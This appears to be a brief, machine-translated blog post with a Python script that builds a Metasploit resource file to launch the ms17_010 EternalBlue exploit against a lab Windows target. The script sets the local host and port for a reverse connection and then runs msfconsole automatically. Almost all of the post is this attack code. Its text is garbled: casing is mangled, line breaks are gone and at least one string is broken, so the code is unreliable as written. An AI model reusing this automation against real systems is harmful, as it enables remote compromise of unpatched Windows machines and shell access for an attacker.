For ms17_010, refer to Http://www.cnblogs.com/sch01ar/p/7672454.html
Target ip:192.168.220.139
Native ip:192.168.220.145
#-*-Coding:utf-8-*-__author__ = "MuT6 sch01ar" import osdef Handler (configfile,lhost,lport,rhost): Configfile.write (' use exploit/windows/smb/ms17_010_eternalblue\n ') configfile.write (' Set Lport ' + str (LPORT) + ') \ n ') configfile.write (' Set lhost ' + str (lhost) + ' \ n ') configfile.write (' Set RHOST ' + str (RHOST) + ' \ n ') con Figfile.write (' exploit\n ') def main (): configfile = open (' ms17_010.rc ', ' W ') lhost = ' 192.168.220.145 ' Lport = 4444 rhost = ' 192.168.220.139 ' Handler (configfile,lhost,lport,rhost) configfile.close () Os.system (' Msfconsole-r ms17_010.rc ') main ()
Run results
Write the associated MSF command by building the. rc file, and then call the. rc file through MSF
python-enables interaction with Metasploit and ms17_010 attacks